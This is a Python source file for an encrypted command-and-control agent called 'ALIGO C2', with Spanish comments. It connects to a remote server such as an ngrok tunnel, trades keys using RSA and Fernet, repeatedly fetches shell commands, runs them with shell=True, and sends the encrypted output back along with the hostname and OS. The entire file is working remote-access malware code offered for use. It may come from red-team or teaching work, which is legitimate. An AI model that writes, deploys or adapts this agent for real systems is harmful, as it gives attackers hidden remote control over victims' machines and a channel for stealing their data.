"""
Agente C2 - Versión HTTPS para ngrok/Internet con Cifrado Híbrido
CONFIGURADO PARA: Conectarse a servidor via HTTP/HTTPS (ngrok)
CIFRADO: RSA-2048 key exchange + Fernet session encryption

USO:
    python3 agent_ngrok.py https://abc123.ngrok.io
    python3 agent_ngrok.py http://servidor.ejemplo.com:5000
    python3 agent_ngrok.py https://abc123.ngrok-free.app
"""

import json
import subprocess
import platform
import uuid
import time
import sys
import os

try:
    import requests
except ImportError:
    print("[!] ERROR: Se requiere el módulo 'requests'")
    print("[*] Instálalo con: pip install requests")
    sys.exit(1)

# Import crypto utilities safely using absolute paths
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from shared.crypto_utils import C2Crypto

# ============================================
# CONFIGURACIÓN FLEXIBLE
# ============================================

# Valores por defecto
DEFAULT_URL = "http://127.0.0.1:5000"

# Si se pasa argumento de línea de comandos, usarlo
if len(sys.argv) >= 2:
    SERVER_URL = sys.argv[1].rstrip('/')  # Quitar / final si existe
else:
    SERVER_URL = DEFAULT_URL

AGENT_ID = "agent-" + str(uuid.uuid4())[:6]
RECONNECT_DELAY = 5  # segundos antes de reintentar si se cae la conexión
POLL_INTERVAL = 2    # segundos entre cada poll al servidor

# Cryptographic state (established during handshake)
agent_session_key = None      # Fernet symmetric key (generated by agent)
server_public_key = None      # Server's RSA public key (fetched from server)


def execute_command(command: str) -> str:
    """Ejecuta un comando del sistema y captura su salida."""
    try:
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True,
            timeout=30,
        )
        output = result.stdout if result.stdout else result.stderr
        return output.strip() or "(sin salida)"
    except subprocess.TimeoutExpired:
        return "(error) comando excedió el tiempo límite"
    except Exception as e:
        return f"(error) {e}"


def fetch_server_public_key():
    """
    Fetch the server's RSA public key from /public-key endpoint.
    
    Returns:
        RSA public key object, or None if failed
    """
    try:
        response = requests.get(
            f"{SERVER_URL}/public-key",
            timeout=10
        )
        response.raise_for_status()
        data = response.json()
        
        # CORRECTED: Checks both keys to ensure compatibility with server
        pem_key = data.get('server_public_key') or data.get('public_key')
        if not pem_key:
            print("[!] Server did not return public key")
            return None
        
        # Deserialize PEM to public key object
        public_key = C2Crypto.deserialize_public_key(pem_key)
        return public_key
        
    except Exception as e:
        print(f"[!] Error fetching server public key: {e}")
        return None


def establish_crypto_session():
    """
    Establish cryptographic session:
    1. Fetch server's RSA public key
    2. Generate agent's Fernet session key
    
    Returns:
        tuple: (agent_session_key, server_public_key) or (None, None) if failed
    """
    global server_public_key, agent_session_key
    
    print("[*] Estableciendo sesión criptográfica...")
    
    # Step 1: Fetch server's public key
    server_public_key = fetch_server_public_key()
    if not server_public_key:
        return None, None
    
    print("[✓] Clave pública del servidor obtenida")
    
    # Step 2: Generate agent's session key
    agent_session_key = C2Crypto.generate_session_key()
    print("[✓] Session key generada (Fernet)")
    
    return agent_session_key, server_public_key


def checkin():
    """Registro inicial en el servidor con session key cifrada."""
    global agent_session_key, server_public_key
    
    if not agent_session_key or not server_public_key:
        print("[!] Crypto session not established")
        return False
    
    try:
        # Encrypt the session key with server's RSA public key
        encrypted_session_key = C2Crypto.rsa_encrypt(server_public_key, agent_session_key)
        
        response = requests.post(
            f"{SERVER_URL}/checkin",
            json={
                "agent_id": AGENT_ID,
                "hostname": platform.node(),
                "os": platform.system(),
                "encrypted_session_key": encrypted_session_key
            },
            timeout=10
        )
        response.raise_for_status()
        print("[✓] Check-in exitoso (session key intercambiada)")
        return True
    except Exception as e:
        print(f"[!] Error en checkin: {e}")
        return False


def poll_command():
    """Preguntar al servidor si hay comandos pendientes (recibe respuesta cifrada)."""
    global agent_session_key
    
    if not agent_session_key:
        print("[!] No session key available")
        return None
    
    try:
        response = requests.post(
            f"{SERVER_URL}/poll",
            json={"agent_id": AGENT_ID},
            timeout=10
        )
        response.raise_for_status()
        data = response.json()
        
        encrypted_payload = data.get("payload")
        if not encrypted_payload:
            return None
        
        # Decrypt the payload
        try:
            decrypted_json = C2Crypto.fernet_decrypt(agent_session_key, encrypted_payload)
            # Handle standard bytes decoding safely
            decrypted_str = decrypted_json.decode('utf-8') if isinstance(decrypted_json, bytes) else decrypted_json
            cmd_data = json.loads(decrypted_str)
            
            # Check if there's an actual command
            if cmd_data.get("command") is not None:
                return cmd_data
            return None
            
        except Exception as decrypt_error:
            print(f"[!] Error decrypting command: {decrypt_error}")
            return None
        
    except Exception as e:
        print(f"[!] Error en poll: {e}")
        return None


def send_result(msg_id: str, output: str, status: str = "ok"):
    """Enviar resultado de comando al servidor (cifrado con session key)."""
    global agent_session_key
    
    if not agent_session_key:
        print("[!] No session key available")
        return False
    
    try:
        # Prepare result data
        result_data = {
            "id": msg_id,
            "output": output,
            "status": status,
        }
        
        # Encrypt the result
        result_json = json.dumps(result_data)
        encrypted_payload = C2Crypto.fernet_encrypt(agent_session_key, result_json)
        
        response = requests.post(
            f"{SERVER_URL}/result",
            json={
                "agent_id": AGENT_ID,
                "payload": encrypted_payload
            },
            timeout=10
        )
        response.raise_for_status()
        return True
    except Exception as e:
        print(f"[!] Error enviando resultado: {e}")
        return False


def run_agent():
    print(f"[*] Agente ID: {AGENT_ID}")
    print(f"[*] Servidor: {SERVER_URL}")
    print(f"[*] Cifrado: RSA-2048 + Fernet (AES-128-CBC)")
    print(f"[*] Presiona Ctrl+C para detener")
    print()
    
    # Loop principal
    while True:
        try:
            # Paso 0: Establecer sesión criptográfica
            print(f"[*] Estableciendo handshake criptográfico...")
            session_key, pub_key = establish_crypto_session()
            
            if not session_key or not pub_key:
                print(f"[!] Falló el handshake criptográfico, reintentando en {RECONNECT_DELAY}s...")
                time.sleep(RECONNECT_DELAY)
                continue
            
            # Paso 1: Checkin
            print(f"[*] Intentando checkin con el servidor...")
            if not checkin():
                print(f"[!] Checkin falló, reintentando en {RECONNECT_DELAY}s...")
                time.sleep(RECONNECT_DELAY)
                continue
            
            print(f"[+] ✅ Conectado al servidor como {AGENT_ID}")
            print(f"[+] 🔒 Canal cifrado establecido")
            
            # Paso 2: Loop de polling
            while True:
                # Preguntar si hay comandos
                cmd_data = poll_command()
                
                if cmd_data and cmd_data.get("type") == "cmd":
                    cmd = cmd_data.get("command")
                    msg_id = cmd_data.get("id")
                    
                    print(f"[cmd recibido] id={msg_id}: {cmd}")
                    
                    # Ejecutar comando
                    output = execute_command(cmd)
                    
                    # Enviar resultado
                    if send_result(msg_id, output):
                        print(f"[resultado enviado] id={msg_id}")
                    else:
                        print(f"[!] Fallo al enviar resultado id={msg_id}")
                
                # Esperar antes del siguiente poll
                time.sleep(POLL_INTERVAL)
        
        except requests.exceptions.ConnectionError:
            print(f"[!] No se pudo conectar al servidor: {SERVER_URL}")
            print(f"[*] ¿Está el servidor corriendo? ¿Es correcta la URL?")
            print(f"[*] Reintentando en {RECONNECT_DELAY}s...")
            time.sleep(RECONNECT_DELAY)
        
        except requests.exceptions.Timeout:
            print(f"[!] Timeout al conectar a {SERVER_URL}")
            print(f"[*] Reintentando en {RECONNECT_DELAY}s...")
            time.sleep(RECONNECT_DELAY)
        
        except KeyboardInterrupt:
            print("\n[*] Agente detenido por el usuario")
            sys.exit(0)
        
        except Exception as e:
            print(f"[!] Error inesperado: {e}")
            print(f"[*] Reintentando en {RECONNECT_DELAY}s...")
            time.sleep(RECONNECT_DELAY)


if __name__ == "__main__":
    print("=" * 50)
    print("  ALIGO C2 - Agente HTTPS con Cifrado Híbrido")
    print("=" * 50)
    print()
    
    if len(sys.argv) > 1:
        print("[i] Usando configuración de línea de comandos")
    else:
        print("[i] Usando configuración por defecto")
        print(f"[i] Puedes especificar: python3 {sys.argv[0]} <url>")
        print(f"[i] Ejemplo: python3 {sys.argv[0]} https://abc123.ngrok.io")
    
    print()
    run_agent()